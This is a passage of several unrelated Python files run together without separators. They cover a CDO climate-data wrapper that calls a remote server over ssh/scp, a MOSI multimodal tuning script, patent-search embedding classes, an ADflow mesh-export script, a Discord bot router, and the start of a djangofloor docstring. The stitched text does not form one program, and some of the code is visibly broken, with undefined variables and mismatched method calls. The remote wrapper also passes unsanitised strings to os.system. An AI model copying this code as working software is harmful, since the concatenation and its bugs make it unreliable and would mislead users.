well as python module Numpy,netCDF4 and Pandas. The module also has the capability to manipulate data on a remote server as long as: 1) (required) The remote server has installed the CDO tools (required). 2) (optional) The remote server has the mycdo python module (e.g. 
in /home/wenchay/mypython/mycdo.py) 3) (optional) The remote server user home path has a python file named .cdo_dump.py with content as: import sys sys.path.append(mycdo_module_dir) import mycdo as mc mc.dump('tmp.nc') """ from __future__ import print_function try: # For Python 3.0 and later from urllib.request import urlopen except ImportError: # Fall back to Python 2's urllib2 from urllib2 import urlopen import os, os.path import tempfile from netCDF4 import Dataset import pandas as pd import numpy as np import shutil import glob import subprocess # parameters _server='' _userHome='/home/wenchay/' # # ######## functions that wrap cdo operators into strings in a list # ---- input file def get_ifile(ifile): '''Return a list with the ifile as the element. The ifile can be a string or list.''' if type(ifile) is list: return ifile else: fname = ifile if not os.path.exists(fname) and not fname.startswith('/'): fname = _userHome + fname return [fname] def get_ifiles(ifile): '''Same as the function get_ifile except that the file name include unix-style wildcards.''' fname = get_ifile(ifile)[0] fname = '\'' + fname + '\'' return [fname] def at_local(ifile): '''Condition on whether the ifile is on local machine or on the remote server.''' if type(ifile) is str: fname = ifile else: fname = ifile[0] if fname.startswith("'") and fname.endswith("'"): fname = fname[1:-1] if glob.glob(fname) or os.uname()[1] in _server: return True else: return False # ---- file operations # ---- selection def get_sel_param_name_list(): '''Get a list of parameter names used for the sel* operator.''' return ['name','stdname','param','code', 'level','levidx','grid','zaxis','ltype','tabnum', 'timestep','year','seas','mon','day','hour','time', 'date','smon', 'lonlatbox','indexbox' ] def get_select_param_name_list(): '''Get a list of parameter names used for the select operator.''' return ['name','param','code', 'level','levidx','ltype', 'minute','hour','day','month','year','timestep','timestep_of_year'] def sel(**kwargs): '''CDO sel* operators. Input arguments are key-value pairs with keys from the return of function get_sel_param_name_list(), and values are all string types with format similar to the CDO command.''' chain = list() for key in [key for key in kwargs.keys() if key in get_sel_param_name_list()]: chain += [ '-sel'+key+','+kwargs[key] ] if not chain: print ('Please choose proper input arguments with keys from:\n', get_sel_param_name_list() ) return return chain def select(**kwargs): '''CDO select operators. 
Input arguments are key-value pairs with keys from the return of function get_sel_param_name_list(), and values are all string types with format similar to the CDO command.\nFunction select can manipulate multiple files while sel* can only operate on a single file.''' chain = list() cmd = '-select' # generate the select commands for key in [key for key in kwargs.keys() if key in get_select_param_name_list()]: cmd += ',' + key + '=' + kwargs[key] if cmd=='-select': print ('''Please choose proper input arguments listed in the return of function get_select_param_name_list():\n''', get_select_param_name_list()) return else: chain = [cmd] # generate the sel* commands after the select for key in [key for key in kwargs.keys() if key not in get_select_param_name_list() and key in get_sel_param_name_list()]: chain += [ '-sel'+key+','+kwargs[key] ] return chain # ---- conditional selection # ---- comparison # ---- modification def get_change_param_name_list(): '''Get a list of parameter names used for the ch* operator''' return ['code','param', 'name','unit','level','levelc','levelv'] def get_set_param_name_list(): '''Get a list of parameter names used for the set* operator.''' return ['parttabp','partabn','partab','code','param', 'name','unit','level','ltype', 'date','time','day','mon','year','tunits', 'taxis','treftime','calendar' 'grid','gridtype','gridarea', 'zaxis', 'gatt','gatts', 'clonlatbox','cindexbox', 'missval','ctomiss','misstoc','rtomiss','vrange'] def change(param,old,new): if param in get_change_param_name_list(): return [ '-ch'+param+','+old+','+new ] else: print ('Please choose proper input parameters from the return of function get_change_param_name_list():\n',get_change_param_name_list()) def enlarge(grid): return [ '-enlarge,'+grid ] def invertlat(): return [ '-invertlat' ] def invertlev(): return [ '-invertlev' ] def set(**kwargs): chain = list() for key in [key for key in kwargs.keys() if key in get_set_param_name_list()]: chain += [ '-set'+key+','+kwargs[key] ] if not chain: print ('Please choose proper input arguments with keys from:\n' \ ,get_sel_param_name_list()) return return chain def shifttime(timeString): return [ '-shifttime,'+timeString ] # ---- arithmetic def arith(operator,ifile1=None,ifile2=None): chain = ['-'+operator ] if ifile1 is not None: chain = get_ifile(ifile1) + chain if ifile2 is not None: chain = get_ifile(ifile2) + chain return chain def expr(expression): return [ '-expr,' + '\'' + expression + '\'' ] # ---- statistics def get_stat_param_name_list(): '''return the list of list of dimension names.''' return [ ['zon','zonal','lon','longitude','longitudinal','x'], ['mer','meridional','lat','latitude','latitudinal','y'], ['fld','field'], ['vert','vertical'], ['tim','time'], ['year','yearly'], ['seas','season','seasonal'], ['mon','month','monthly'], ['day','daily'], ['hour','hourly'], ['ymon','multi-year monthly'], ['yday','multi-year daily'], ['run','running'] ] def stat(overDimension='time',statName='mean',N=None,ifile=None): # get the dimension name s = overDimension.lower() dimension = [par_list for par_list in get_stat_param_name_list() if s in par_list][0][0] # statistics name if statName.lower()=='percentile': statName = 'pctl' cmd = dimension + statName # running statistics with a num of points parameter if dimension=='run': cmd += ','+str(N) # whether to combine the operator and the ifile or not chain = [ '-'+cmd ] if ifile is not None: chain = get_ifile(ifile) + chain return chain def stat_pctl(ifile,N,overDimension='time'): '''percentile over 
time or similar dimension that needs three ifiles''' return get_ifile(ifile) + stat(overDimension,'max') \ + get_ifile(ifile) + stat(overDimension,'min') \ + get_ifile(ifile) + stat(overDimension,'pctl,'+str(N)) # ---- correlation def cor(dim='tim'): '''Correlation coefficients.Dimension can be tim or fld. ''' chain = list(); chain += [ '-' + dim + 'cor' ] return chain def covar(dim='tim'): '''Covariance. Dimension can be tim or fld. ''' chain = list(); chain += ['-' + dim + 'covar' ] return chain # ---- regression def regress(): return [ '-regres' ] def detrend(): return [ '-detrend' ] # ---- EOFs # ---- interpolation # ---- transformation # ---- import/export # ---- miscellaneous # ---- climate indices # # ######## low-level functions # ---- convert the chain of cdo operators to a command string that can be executed in shell def get_cdocmd(chain,ofile1=None,ofile2=None): '''Transforms the chain of operators into a string that is executable in Shell.\n\nchain is a list representing chains of operators.''' if ofile1 is None: ofile = '' else: ofile = ofile1 if ofile2 is not None: ofile += ' ' + ofile2 if len(chain)==1: cdocmd = 'cdo pardes ' + chain[0] else: cdocmd = 'cdo ' + ' '.join(chain[-1::-1]) + ' ' + ofile return cdocmd # ---- run system commands def run_command(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE,**kwargs): if type(cmd) is str: cmd = cmd.split() p = subprocess.Popen(cmd,stdout=stdout,stderr=stderr,**kwargs) stdout,stderr = p.communicate() exitCode = p.returncode if exitCode: print (stderr) else: print (stdout) return exitCode # ---- communicate with the remote server def run_cdo_remote(cdocmd=None,server=_server,otxtfile='.tmp.txt'): sshcmd = "ssh -t " + server + ' "' \ + cdocmd \ + " > " + otxtfile \ + '" ' print ('\n','-'*10, 'Connecting to server ...\n',sshcmd) if os.system(sshcmd)==0: with tempfile.NamedTemporaryFile(suffix='.txt') as tmp: copycmd = "scp " + server + ":~/" + otxtfile + ' ' + tmp.name print ('\n','-'*10,'Download and show what has been shown on remote server screen ...\n',copycmd) if os.system(copycmd)==0: # scp the result file to the local temp file return os.system('cat ' + tmp.name) def download_datafile(datafile_remote='.tmp.nc',server=_server): tmp = tempfile.NamedTemporaryFile(suffix='.nc') copycmd = "scp " + server + ":~/" + datafile_remote + ' ' + tmp.name print ('\n','-'*10,'Download data file on remote server ...\n',copycmd) os.system(copycmd) return tmp # ---- convert the chain of cdo operators into python file objects def get_data_file_obj(chain): '''Generates a temporary file object pointing to the output netcdf file. 
\n\nchain can be a list of cdo commands or a string of input file name.''' if type(chain) is str: datafile = chain if at_local(datafile): # data is at local tmp = open(datafile) else: # data is at remote server datafile = get_ifile(chain)[0] tmp = download_datafile(datafile_remote=datafile,server=_server) elif type(chain) is list: if at_local(chain): # data is at local tmp = tempfile.NamedTemporaryFile(suffix='.nc') cdocmd = get_cdocmd(chain,ofile1=tmp.name) print ('\n','-'*10,'Running cdo ...') print (cdocmd) os.system(cdocmd) else: # data is at remote server if run_cdo_remote( cdocmd=get_cdocmd(chain,ofile1='.tmp.nc'),server=_server )==0: tmp = download_datafile(datafile_remote='.tmp.nc',server=_server) return tmp # # ######## high-level functions # ---- query information about the ifile or modified ifile def get_show_param_name_list(): '''Get a list of parameter names used for the show* operator.''' return ['format','code', 'name','stdname', 'level','ltype', 'year','mon','date','time','timestamp' ] def get_des_param_name_list(): '''Get a list of paramerter name used for the show* operator.''' return ['par','grid','zaxis','vct'] def info(ifile): '''Equivalent to the cdo operator infon.''' ifile = get_ifile(ifile) cdocmd = 'cdo infon ' + ' '.join(ifile[-1::-1]) if at_local(ifile): return run_command(cdocmd) else: return run_cdo_remote(cdocmd=cdocmd) def sinfo(ifile): '''Equivalent to the cdo operator sinfon.''' ifile = get_ifile(ifile) cdocmd = 'cdo sinfon ' + ' '.join(ifile[-1::-1]) if at_local(ifile): return run_command(cdocmd) else: return run_cdo_remote(cdocmd=cdocmd) def show(ifile,param='par'): cdocmd = ' '.join( get_ifile(ifile)[-1::-1] ) if param in get_show_param_name_list(): cdocmd = 'cdo show' + param + ' ' + cdocmd elif param in get_des_param_name_list(): cdocmd = 'cdo ' + param + 'des ' + cdocmd else: print ('Please choose proper params from the return of function get_show_param_name_list() or the function get_des_param_name_list():\n',get_show_param_name_list(),'\n or \n',get_des_param_name_list()) return if at_local(ifile): return run_command(cdocmd) else: return run_cdo_remote(cdocmd) def look(chain): '''Dump a local netcdf file, or dump a remote netcdf file and then download the results. 
\n\n The input argument chain can be either a string (netcdf file name) or a list representing a chain of cdo operators.''' if at_local(chain): with get_data_file_obj(chain) as tmp: # dump the output netcdf file print ('\n','-'*10,'Data file information:...') filesize = os.path.getsize(tmp.name); units = 'B' if filesize > 10000: filesize /= 1000; units = 'K' if filesize > 10000: filesize /= 1000; units = 'M' print (tmp.name+': ',str(filesize) + units) with Dataset(tmp.name) as ncobj: vnames = ncobj.variables.keys() for vname in vnames: if hasattr(ncobj.variables[vname],'units'): units = ncobj.variables[vname].units else: units = 'units N/A' print (vname, zip(ncobj.variables[vname].dimensions, ncobj.variables[vname].shape), '; ', units) else:# not at_local(chain) try: if type(chain) is str or ( type(chain) is list and len(chain)==1 ): fname = get_ifile(chain)[0] cdocmd = "ln -sfn " + fname + " ~/.tmp.nc && python .cdo_dump.py && rm ~/.tmp.nc" else: cdocmd = get_cdocmd(chain,output='.tmp.nc') + " && python .cdo_dump.py " run_cdo_remote(cdocmd=cdocmd) except: ifile = get_ifile(chain) cdocmd = 'cdo sinfon ' + ' '.join( ifile[-1::-1] ) run_cdo_remote(cdocmd=cdocmd) # ---- save result data file into ofile def save(chain,ofile1=None,ofile2=None): '''save the final netcdf file to the output file.''' if ofile1 is not None: if at_local(chain): cdocmd = get_cdocmd(chain=chain,ofile1=ofile1,ofile2=ofile2) if os.system(cdocmd)==0: print ('\n'+'-'*10,'File has been saved to','\nofile1:',ofile1,'\nofile2:',ofile2) else: ofile1 = get_ifile(ofile1)[0] if ofile2 is not None: ofile2 = get_ifile(ofile2)[0] cdocmd = get_cdocmd(chain=chain,ofile1=ofile1,ofile2=ofile2) if run_cdo_remote(cdocmd=cdocmd)==0: print ('\n'+'-'*10,'File has been saved on server to','\nofile1:',ofile1,'\nofile2:',ofile2) else: print ('Please choose output file names.') # ---- read result data file into memory as ndarray or dictionary of ndarray def get_months(season='Annual'): months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun'] if season.lower()=='annual': # 12 months array months = months[:12] elif season in months: # season contains only one month months = [season] else: # season defined by consecutive month initials months_short = 'JFMAMJJASONDJFMAMJ' i = months_short.find(season) N = len(season) months = months[i:i+N] return months def num2time(num,units): '''Convert expression of time from days/months since ... into pandas PeriodIndex.''' if units.lower().startswith('months since'): period = pd.Period(units.split()[2][:7]) elif units.lower().startswith('days since'): period = pd.Period(units.split()[2]) else: period = None return pd.PeriodIndex(period + np.floor(num).astype('int')) def read(chain,varname=None): '''Read the output netcdf file into memory as a dictionary. \n\n chain can be either a string (netcdf file name) or a list representing chains of operators. 
\n\n return a numpy array value if vname is not None.''' with get_data_file_obj(chain=chain) as tmp: with Dataset(tmp.name) as ncobj: vnames = ncobj.variables.keys() zzDict = dict() if varname is None: vnames = ncobj.variables.keys() else: vnames = [varname] for vname in vnames: zzDict[vname] = ncobj.variables[vname][:] if vname in ['time','T','T2']: # change the time units tN = ncobj.variables[vname][:] units = ncobj.variables[vname].units zzDict[vname] = num2time(tN,units) if varname is None: return zzDict else: return zzDict[varname] # import math import os import sys from argparse import ArgumentParser import pytorch_lightning as pl import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from filelock import FileLock from loguru import logger from ray import tune from slp.config.config_parser import make_cli_parser, parse_config from slp.config.omegaconf import OmegaConfExtended as OmegaConf from slp.data.cmusdk import mosi from slp.data.collators import MultimodalSequenceClassificationCollator from slp.data.multimodal import MOSI from slp.modules.classifier import TransformerLateFusionClassifier from slp.plbind import ( FromLogits, PLDataModuleFromDatasets, PLModule, make_trainer, make_trainer_for_ray_tune, ) from slp.plbind.dm import split_data from slp.plbind.module import MultimodalTransformerClassificationPLModule from slp.util.log import configure_logging from slp.util.tuning import run_tuning modalities = {"text", "audio", "visual"} def get_data( seed=None, remove_pauses=False, pad="front", max_length=-1, train=True, val=True, test=False, ): pad_front = False pad_back = False if pad == "front": pad_front = True elif pad == "back": pad_back = True # with FileLock(os.path.expanduser("~/data.lock")): train_data, dev_data, test_data, w2v = mosi( "/home/efthygeo/experimental/pytorch-slp/slp/data/mosi_final_aligned/", pad_front=pad_front, pad_back=pad_back, max_length=max_length, remove_pauses=remove_pauses, modalities=modalities, already_aligned=True, align_features=False, # cache="./cache/mosi.p", ) train = MOSI(train_data, modalities=modalities, binary=False, text_is_tokens=False) dev = MOSI(dev_data, modalities=modalities, binary=False, text_is_tokens=False) test = MOSI(test_data, modalities=modalities, binary=False, text_is_tokens=False) if not test: test = None return train, dev, test def get_parser(): parser = ArgumentParser("MOSI Tuning") parser.add_argument( "--hidden", dest="model.hidden_size", type=int, default=100, help="Intermediate hidden layers for linear module", ) parser.add_argument( "--inner", dest="model.inner_size", type=int, default=200, help="Inner size", ) parser.add_argument( "--heads", dest="model.num_heads", type=int, default=2, help="Number of heads", ) parser.add_argument( "--layers", dest="model.num_layers", type=int, default=2, help="Number of transformer layers", ) parser.add_argument( "--prenorm", dest="model.prenorm", action="store_true", help="Use prenorm" ) parser.add_argument( "--scalenorm", dest="model.scalenorm", action="store_true", help="Use scalenorm" ) parser.add_argument("--dropout", dest="model.dropout", default=0.1, help="Dropout") parser.add_argument( "--kernel-size", dest="model.kernel_size", default=None, help="Residual convolution in attention", ) return parser def train_mosi(config, train=None, val=None): # Convert dictionary to omegaconf dictconfig object config = OmegaConf.create(config) train, val, _ = get_data( remove_pauses=config.preprocessing.remove_pauses, pad=config.preprocessing.pad, 
max_length=config.preprocessing.max_length, ) collate_fn = MultimodalSequenceClassificationCollator(device="cpu") # Create data module config.data.batch_size_eval = config.data.batch_size ldm = PLDataModuleFromDatasets( train, val=val, seed=config.seed, no_test_set=True, collate_fn=collate_fn, **config.data ) feature_sizes = {"audio": 74, "visual": 35, "text": 300} # Create model, optimizer, criterion, scheduler model = TransformerLateFusionClassifier( feature_sizes, 1, max_length=512, nystrom=False, kernel_size=config.model.kernel_size, num_layers=config.model.num_layers, num_heads=config.model.num_heads, dropout=config.model.dropout, hidden_size=config.model.hidden_size, inner_size=config.model.inner_size_multiple * config.model.hidden_size, # inner_size=config.model.inner_size, prenorm=config.model.prenorm, scalenorm=config.model.scalenorm, ) optimizer = getattr(optim, config.optimizer)(model.parameters(), **config.optim) criterion = nn.MSELoss() lr_scheduler = None if config.lr_scheduler: lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau( optimizer, **config.lr_schedule ) lm = MultimodalTransformerClassificationPLModule( model, optimizer, criterion, lr_scheduler=lr_scheduler, hparams=config, ) # Map Lightning metrics to ray tune metris. metrics_map = {"validation_loss": "best_score"} assert ( config["tune"]["metric"] in metrics_map.keys() ), "Metrics mapping should contain the metric you are trying to optimize" # Train model trainer = make_trainer_for_ray_tune(metrics_map=metrics_map, **config.trainer) trainer.fit(lm, datamodule=ldm) def configure_search_space(config): config["preprocessing"] = { "remove_pauses": tune.choice([True, False]), "pad": tune.choice(["front", "back"]), "max_length": tune.choice([-1, 20, 50, 75]), } config["model"] = { "hidden_size": tune.qrandint(64, 384, q=8), # "inner_size": tune.choice([32, 64, 128, 256, 512, 1024, 2048]), # "inner_size_multiple": tune.qrandint(2, 4, q=2), "inner_size_multiple": 2, "num_heads": tune.choice([2, 4, 8]), # "num_layers": tune.randint(1, 4), "num_layers": 3, # "prenorm": tune.choice([False, True]), "prenorm": False, "scalenorm": tune.choice([False, True]), # "kernel_size": tune.choice([None, 11, 33]), "kernel_size": 33, "dropout": tune.uniform(0.2, 0.4), } # config["model"]["inner_size"] = tune.sample_from(lambda spec: spec.config.hidden_size * np.random.choice([2, 4])) # config["inner_size_multiple"] * config["model"]["hidden_size"] # config["lr_scheduler"] = tune.choice([False, True]) config["lr_scheduler"] = True # config["lr_schedule"]["patience"] = tune.randint(2, 5) config["lr_schedule"]["patience"] = 5 # config["lr_schedule"]["factor"] = tune.loguniform(0.1, 0.5) config["lr_schedule"]["factor"] = 0.2 # config["optimizer"] = tune.choice(["SGD", "Adam", "AdamW"]) config["optimizer"] = "AdamW" # config["optim"]["lr"] = tune.loguniform(1e-4, 1e-2) config["optim"]["lr"] = 1e-4 # config["optim"]["weight_decay"] = tune.loguniform(1e-4, 1e-1) config["optim"]["weight_decay"] = 5e-4 # config["data"]["batch_size"] = tune.choice([8, 16, 32, 64]) config["data"]["batch_size"] = tune.choice([8, 16]) config["trainer"]["gradient_clip_val"] = tune.choice([0, 0.1]) # config["trainer"]["gradient_clip_val"] = 0.1 return config if __name__ == "__main__": # SETUP ################################################## parser = get_parser() parser = make_cli_parser(parser, PLDataModuleFromDatasets) # type: ignore config = parse_config(parser, parser.parse_args().config) if config.trainer.experiment_name == "experiment": 
config.trainer.experiment_name = "mosi-tuning" configure_logging() if config.seed is not None: logger.info("Seeding everything with seed={seed}") pl.utilities.seed.seed_everything(seed=config.seed) # These arguments may be provided from the command line or a config file config = OmegaConf.to_container(config) # config["tune"] = { # "num_trials": 10, # "cpus_per_trial": 1, # "gpus_per_trial": 0.12, # "metric": "accuracy", # "mode": "max", # } config["wandb"] = {} config["wandb"]["project"] = "tuning-mosi-search-space-2" # config["trainer"]["max_epochs"] = 15 config = OmegaConf.create(config) # Handle train / val splitting. # All trials should run on the same validation set best_config = run_tuning( config, # type: ignore "configs/best.mosi.tune.yml", train_mosi, configure_search_space, ) vsvarunsharma10/pqai import numpy as np from nltk.tokenize import RegexpTokenizer import math import numba import re import json from sklearn.decomposition import TruncatedSVD from core.utils import is_cpc_code, is_patent_number from config.config import models_dir from core.db import get_patent_data from config.config import models_dir as MODELS_DIR class GloveWordEmbeddings(): def __init__(self): self.models_dir = MODELS_DIR self.vocab_file = self.models_dir + '/glove-vocab.json' self.dict_file = self.models_dir + '/glove-dictionary.json' self.dfs_file = self.models_dir + '/dfs.json' self.embeddings_file = self.models_dir + '/glove-We.npy' self.vocab = None self.dictionary = None self.dfs = None self.sifs = None self.embeddings = None self.dims = None self._load() def _load(self): with open(self.vocab_file) as file: self.vocab = json.load(file) with open(self.dict_file) as file: self.dictionary = json.load(file) with open(self.dfs_file) as file: self.dfs = json.load(file) self.embeddings = np.load(self.embeddings_file) self.sifs = { word:self.df2sif(word, self.dfs) for word in self.dfs } self.dims = self.embeddings.shape[1] def __len__(self): return self.embeddings.shape[0] @staticmethod def df2sif(word, dfs): n = dfs[word] N = dfs['the'] p = n / N a = 0.01 w = a / (a + p) return w def __getitem__(self, item): if type(item) is int: return self.embeddings[item] elif type(item) is str: item = item if item in self.dictionary else '' return self.embeddings[self.dictionary[item]] else: return np.zeros(self.dims) def get_sif (self, word): return self.sifs.get(word, 1.0) class Embeddings(): """Base class for a collection of items and their corresponding vectors, e.g., word embeddings obtained from word2vec or GloVe. Attributes: items (list): Item labels vectors (iterable): An array of item vectors """ def __init__(self, items, vectors): """Initialize Args: items (list): Labels with which items are identified. Labels must be hashable (used in an internal dictionary). vectors (ndarray): An array containing vectors for items in the same sequence as the in the `items` list. Raises: Exception: if the number of items are NOT equal to the number of vectors, i.e., lack of one-to-one mapping between items and vectors. """ if len(items) != len(vectors): raise Exception('Unequal number of items and vectors.') self.items = items self.vectors = vectors self._dict = self._make_dict(self) def _make_dict(self): """Make a dictionary for quick look up of item vectors. """ self._dict = { item: i for i, item in enumerate(self.items) } def __getitem__(self, item): """Get the vector for given item. 
Args: item (str): Item label Returns: ndarray: Item vector """ i = self._dict[item] return self.vectors[i] class WordEmbeddings(Embeddings): """Class for collection of word embeddings. Attributes: PAD (str): Label for the padding token UNK (str): Label for the unknown token """ def __init__(self, words, embeddings, pad='', unk=''): """Initialize word embeddings Args: words (list): Words embeddings (ndarray): Word embeddings (vectors) pad (str, optional): Label for the padding token, usually filled in empty places in a string having fewer words than the required sequence length unk (str, optional): Label for the unknown tokens """ super().__init__(items, embeddings) self.PAD = pad self.UNK = unk def __getitem__(self, word): """Return vector for a given word. If the vector for the given word isn't known, then the vector for the unknown token `` is returned. Args: word (str): A word Returns: ndarray: The vector corresponding to the given word """ if word not in self._dict: return self.__getitem__(self.UNK) return super().__getitem__(word) class Text(str): def __init__(self, text): self._text = text self._default_tokenizer = RegexpTokenizer(r'\w+') def to_tokens(self, tokenizer=None): if not tokenizer: tokenizer = self._default_tokenizer tokens = tokenizer.tokenize(self._text_lower) return TokenSequence(tokens) @property def _text_lower(self): return self._text.lower() def __repr__(self): prefix = 'Text: ' if len(self._text) < 77: return prefix + self._text else: return prefix + self._text[:17] + '...' class TokenSequence(list): def __init__(self, tokens): super().__init__(tokens) self._tokens = tokens def to_vector_sequence(self, token_embeddings): vectors = [token_embeddings[token] for token in self._tokens] return VectorSequence(self._tokens, vectors) @property def tokens(self): return self._tokens class VectorSequence(): def __init__(self, labels, vectors): self._labels = labels self._sequence = np.array(vectors) self._n = len(vectors) self._dims = self._sequence.shape[1] self._fixed_length = None self._default_interaction = Interaction() self._default_interaction.metric = 'cosine' self._default_interaction.amplify = False self._default_interaction.reinforce = True self._default_interaction.context = True self._default_interaction.window = 5 @property def labels(self): return self._labels def __repr__(self): text = f'VectorSequence: {len(self._labels)} labels, {len(self._sequence)} vectors;' text += f' Labels: {", ".join(self._labels[:5])}' text += ', ...' 
if self._labels[5:] else '' return text def _weighted_by_tokens(self, weights): W = [weights[token] for token in self._tokens] return self.weighted_by_vectors(W) def _weighted_by_vectors(self, W): W = np.array(W).reshape(1, -1) return self._sequence * W.T def weigh(self, weights): if isinstance(weights, dict): self._weighted_by_tokens(weights) self._weighted_by_vector(weights) @property def redundancy_vector(self): interact = self._default_interaction.interact interactions = interact(self, self) interactions = np.tril(interactions._matrix, -1) return np.max(interactions, axis=1) @property def matrix(self): if self._fixed_length is None: return self._sequence if self._n > self._fixed_length: return self._truncated else: return self._padded @property def _truncated(self): return self._sequence[:self._fixed_length] @property def _padded(self): r = self._fixed_length - self._n shape = (r, self._dims) padding = np.zeros(shape) return np.concatenate((self._sequence, padding)) def set_length(self, n): self._fixed_length = n return self @property def normalized_matrix(self): row_magnitudes = np.sqrt(np.sum(self._sequence*self._sequence, axis=1, keepdims=True)) row_magnitudes += np.finfo(float).eps return self._sequence / row_magnitudes class Interaction(): def __init__(self, metric='cosine', context=False, amplify=False, reinforce=False, window=5): self.metric = metric self.context = context self.amplify = amplify self.reinforce = reinforce self.window_size = window self._amplify_matrix = np.vectorize(self._amplify) self._a = 3.2 self._b = 7.5 self._c = 0.46 self._f = 1.0 self._h = 0.0 def _dot_interaction(self, A, B): return np.matmul(A, B.T) def _cosine_interaction(self, A, B): An = self._normalize_rows(A) Bn = self._normalize_rows(B) return self._dot_interaction(An, Bn) def _euclidean_interaction(self, A, B): diff = A-B sq_diff = diff*diff return np.sqrt(sq_diff) def _context_sequence(self, vector_seq): M = vector_seq.matrix C = np.zeros(M.shape) C *= np.array([sifs[word] if word in sifs else 1.0 for word in vector_seq.labels]).reshape((-1, 1)) r = min(len(M-1), self.window_size+1) for i in range(1, r): C[i:,:] += M[:-i,:] C[:-i,:] += M[i:,:] return C def interact(self, vector_seq_A, vector_seq_B): A = vector_seq_A.matrix B = vector_seq_B.matrix I = self.interaction_fn(A, B) I = self._amplifier(I) if self.amplify else I if not self.context: return InteractionMatrix(I) Ac = self._context_sequence(vector_seq_A) Bc = self._context_sequence(vector_seq_B) Ic = self.interaction_fn(Ac, Bc) Ic = self._amplifier(Ic) if self.amplify else Ic if not self.reinforce: return InteractionMatrix(I+Ic) M = self._reinforce(I, Ic) return InteractionMatrix(M) @property def interaction_fn(self): if self.metric == 'cosine': return self._cosine_interaction elif self.metric == 'dot': return self._dot_interaction elif self.metric == 'euclidean': return self._euclidean_interaction @staticmethod def _normalize_rows(M): row_magnitudes = np.sqrt(np.sum(M*M, axis=1, keepdims=True)) row_magnitudes += np.finfo(float).eps return M / row_magnitudes @staticmethod def _reinforce(A, B): return 0.25*(A + B + 2*(A*B)) def _amplify(self, x): return self._h + (self._f/(1+(self._a*math.exp(self._b*(x-self._c))))) @staticmethod @numba.vectorize([numba.float64(numba.float64)]) def _amplifier(x): return 1/(1+(3.2*math.exp(-7.5*(x-0.46)))) class InteractionMatrix(): def __init__(self, I): self._matrix = I def available_metrics(self): return self._available_interactions def maxpool(self, direction='horizontal'): axis = 1 if direction == 
'horizontal' else 0 return np.max(self._matrix, axis=axis) embeddings = GloveWordEmbeddings() sifs = embeddings.sifs from scipy.spatial import distance from core.utils import normalize_rows class BagOfVectors(): def __init__(self, vectors): self._vectors = vectors @classmethod def wmd(self, bov1, bov2, dist_fn=distance.cosine): n1 = len(bov1) n2 = len(bov2) if n1 == 0 or n2 == 0: return math.inf dists = np.zeros((n1, n2)) for i, v1 in enumerate(bov1): for j, v2 in enumerate(bov2): dists[i, j] = dist_fn(v1, v2) return dists.min(axis=1).sum() class BagOfEntities(set): def __init__(self, entities): super().__init__(entities) self._entities = set(entities) def non_overlapping(self): independent = set([]) for entity in self._entities: if not self._is_part_of_another(entity): independent.add(entity) return independent def _is_part_of_another(self, entity): separator = r'[\_\s]' for target in self._entities: if target == entity: continue if re.search(rf'^{entity}{separator}', target): return True if re.search(rf'{separator}{entity}{separator}', target): return True if re.search(rf'{separator}{entity}$', target): return True return False """ This script was used to generate the onera_m6.json input file needed for the MultiUSMesh test. It could also be useful for creating other tests in the future. We use ADflow to get mesh information and then write it as a dictionary in a JSON file. Unlike USMesh, MultiUSMesh needs surface information before generating internal surfaces. By saving the mesh data, we avoid adding ADflow as a testing dependency. """ import os from adflow import ADFLOW from baseclasses.utils import writeJSON baseDir = os.path.dirname(os.path.abspath(__file__)) gridFile = os.path.join(baseDir, "../input_files/onera_m6.cgns") # Set up ADflow aeroOptions = { "gridFile": gridFile, "outputDirectory": baseDir, "MGCycle": "sg", # This is needed to avoid problems with coarse grid initialization } CFDSolver = ADFLOW(options=aeroOptions) # Get the mesh data from ADflow meshInd = CFDSolver.getSolverMeshIndices() conn, faceSizes, cgnsBlockIDs = CFDSolver.getSurfaceConnectivity( CFDSolver.meshFamilyGroup, includeZipper=False, includeCGNS=True ) pts = CFDSolver.getSurfaceCoordinates(CFDSolver.meshFamilyGroup, includeZipper=False) # Save the ADflow output meshData = { "meshInd": meshInd, "conn": conn, "faceSizes": faceSizes, "cgnsBlockIDs": cgnsBlockIDs, "pts": pts, } jsonFile = os.path.join(baseDir, "onera_m6.json") writeJSON(jsonFile, meshData) 100-1000 from discord import Client, Message from pymysql import Connection from src.Storage import Storage from src.controller.routes.blackJack.hit import blackJackHitWithPrivateMessage from src.controller.routes.blackJack.stay import blackJackStayWithPrivateMsg from src.controller.routes.anonymityBoard import anonymityBoard from src.controller.routes.help.getHelp import getHelp from src.controller.routes.help.getHelpForMoney import getHelpForMoney from src.controller.routes.help.getHelpForAnnomity import getHelpForAnnomity from src.controller.routes.help.getHelpForBlackJack import getHelpForBlackJack from src.controller.routes.help.getHelpForCommand import getHelpForCommand from src.controller.routes.help.getHelpForGift import getHelpForGift from src.controller.routes.help.getHelpForLottery import getHelpForLottery from src.controller.routes.help.getHelpForTaxesPoker import getHelpForTaxesPoker from src.controller.routes.help.getHelpForVIP import getHelpForVIP import re async def privateMsgRouter(self: Client, message: Message, db: Connection, storage: 
Storage): if re.match(f"^要$", message.content): await blackJackHitWithPrivateMessage(self, message, storage.casino, storage.gamePlayerWaiting) return if re.match(f"^不要$", message.content): await blackJackStayWithPrivateMsg(self, db, message, storage.casino, storage.gamePlayerWaiting) return if re.match(f"^匿名 .+", message.content): await anonymityBoard(self, message, message.content, db, storage.anonymityBoardChannel) return if re.match(f"^帮助$", message.content): await getHelp(self, message) return if re.match(f"^1$", message.content): await getHelpForMoney(self, message) return if re.match(f"^2$", message.content): await getHelpForCommand(self, message) return if re.match(f"^3$", message.content): await getHelpForGift(self, message) return if re.match(f"^4$", message.content): await getHelpForVIP(self, message) return if re.match(f"^5$", message.content): await getHelpForBlackJack(self, message) return if re.match(f"^6$", message.content): await getHelpForTaxesPoker(self, message) return if re.match(f"^7$", message.content): await getHelpForLottery(self, message) return if re.match(f"^8$", message.content): await getHelpForAnnomity(self, message) return"""Decorators to declare signals and remote functions ================================================== ALso define common functions for allowing (or not) signal calls to user, and several tools for checking arguments provided to the signal (or function). Decorators ---------- Three decorators are provided, for creating signals, websocket functions or special signals for validating forms. Original functions are left unmodified by the decorators. These decorators instantiate a :class:`djangofloor.decorators.Connection` object and stores it in the corresponding dict (`REGISTERED_FUNCTIONS` or `REGISTERED_SIGNALS`). Restrict signal/function use ---------------------------- When creating a connection, you provide a callable that checks if the 